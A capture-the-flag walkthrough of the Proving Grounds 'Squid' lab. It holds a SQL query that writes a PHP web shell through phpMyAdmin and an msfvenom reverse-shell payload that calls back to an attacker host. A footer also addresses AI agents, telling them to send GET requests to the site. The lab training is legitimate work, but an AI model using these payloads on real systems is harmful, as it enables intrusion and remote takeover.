# Proving grounds Practice: Squid

Proving grounds Practice - Squid CTF writeup.

### Nmap

```sh
PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
```

Squid http proxy service running on PORT 3128. Use [Squid Pivoting Open Port Scanner](https://github.com/aancw/spose) to perform PORT scanning.

![img](/files/1ZxPqCnguQNLBCmlITD2)

Configure the proxy `server IP` and `PORT` in the browser to access the webserver running on PORT 8080.

![img](/files/odwHib6MyG8o8JvEd0bk)

**System Information**

![img](/files/SQcRSAP8eg5kfuRGXRRe)

**PHPMyadmin**

![img](/files/UVdaTbYqIFTNIxu8ZMHA)

Login with username `root` and password as `null`.

Execute below sql query to create reverse shell.

```sql
SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"
```

As shown in the phpinfo() page the document root folder is `C:/wamp/www`. So the shell will be publicly accessible at `http://192.168.237.189:8080/shell2.php`.

### Remote Code Execution

```
http://192.168.237.189:8080/shell2.php?cmd=whoami
```

![img](/files/9CHCm71DvvTzwclXZuqM)

### Obtain Stable Shell using msfvenom

```sh
msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe
```

Use curl to download the shell in to the attacking machine. Run a `nc` llisterner and execute the reverse shell by visiting `http://192.168.237.189:8080/shell2.php?cmd=mshell.exe`

![img](/files/EVupLGGecHLwhmVbpk1M)

Reverse shell obtained.

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-08-20-proving_grounds_practice-squid.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.